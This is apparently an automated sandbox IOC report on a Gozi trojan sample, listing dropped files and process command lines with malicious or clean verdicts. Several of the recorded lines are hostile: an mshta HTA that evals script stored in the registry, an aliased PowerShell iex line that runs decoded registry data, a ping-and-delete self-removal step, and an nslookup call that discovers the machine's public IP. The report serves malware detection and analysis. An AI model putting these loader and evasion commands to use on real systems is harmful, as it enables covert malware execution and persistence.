IOC Report


Files

File Path | Type | Category | Malicious
gozi.exe | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | initial sample | malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log | ASCII text, with CRLF line terminators | dropped | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | dropped | clean
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | clean
C:\Users\user\AppData\Local\Temp\3B0F.bi1 | ASCII text, with CRLF line terminators | modified | clean
C:\Users\user\AppData\Local\Temp\5n300s0s.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean
C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean
C:\Users\user\AppData\Local\Temp\5n300s0s.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean
C:\Users\user\AppData\Local\Temp\5n300s0s.out | UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators | modified | clean
C:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP | MSVC .res | dropped | clean
C:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP | MSVC .res | dropped | clean
C:\Users\user\AppData\Local\Temp\RES73F8.tmp | Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols | dropped | clean
C:\Users\user\AppData\Local\Temp\RES8712.tmp | Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epyy1szg.01u.psm1 | very short file (no magic) | dropped | clean
C:\Users\user\AppData\Local\Temp\hscan34n.0.cs | UTF-8 Unicode (with BOM) text | dropped | clean
C:\Users\user\AppData\Local\Temp\hscan34n.cmdline | UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | dropped | clean
C:\Users\user\AppData\Local\Temp\hscan34n.dll | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | clean
C:\Users\user\AppData\Local\Temp\hscan34n.out | UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators | modified | clean
C:\Users\user\DeviceFile.ps1 | ASCII text, with no line terminators | dropped | clean
C:\Users\user\Documents\20220112\PowerShell_transcript.768287.AFX4atZf.20220112130217.txt | UTF-8 Unicode (with BOM) text, with CRLF line terminators | dropped | clean
C:\Users\user\SettingsDocument.lnk | MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized | dropped | clean
\Device\ConDrv | ASCII text, with CRLF, CR line terminators | dropped | clean
13 further files are not shown in this report.

Processes

Path | Cmdline | Malicious
C:\Users\user\Desktop\gozi.exe | "C:\Users\user\Desktop\gozi.exe" | malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | malicious
C:\Windows\System32\mshta.exe | C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) | malicious
C:\Windows\System32\control.exe | C:\Windows\system32\control.exe -h | malicious
C:\Windows\explorer.exe | C:\Windows\Explorer.EXE | malicious
C:\Windows\System32\cmd.exe | C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | malicious
C:\Windows\System32\PING.EXE | ping localhost -n 5 | malicious
C:\Windows\System32\rundll32.exe | "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h | malicious
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | malicious
C:\Windows\System32\cmd.exe | cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1" | malicious
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | malicious
C:\Windows\System32\nslookup.exe | nslookup myip.opendns.com resolver1.opendns.com | malicious
C:\Windows\System32\cmd.exe | cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1" | malicious
C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding | malicious
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | clean
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline | clean
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP" | clean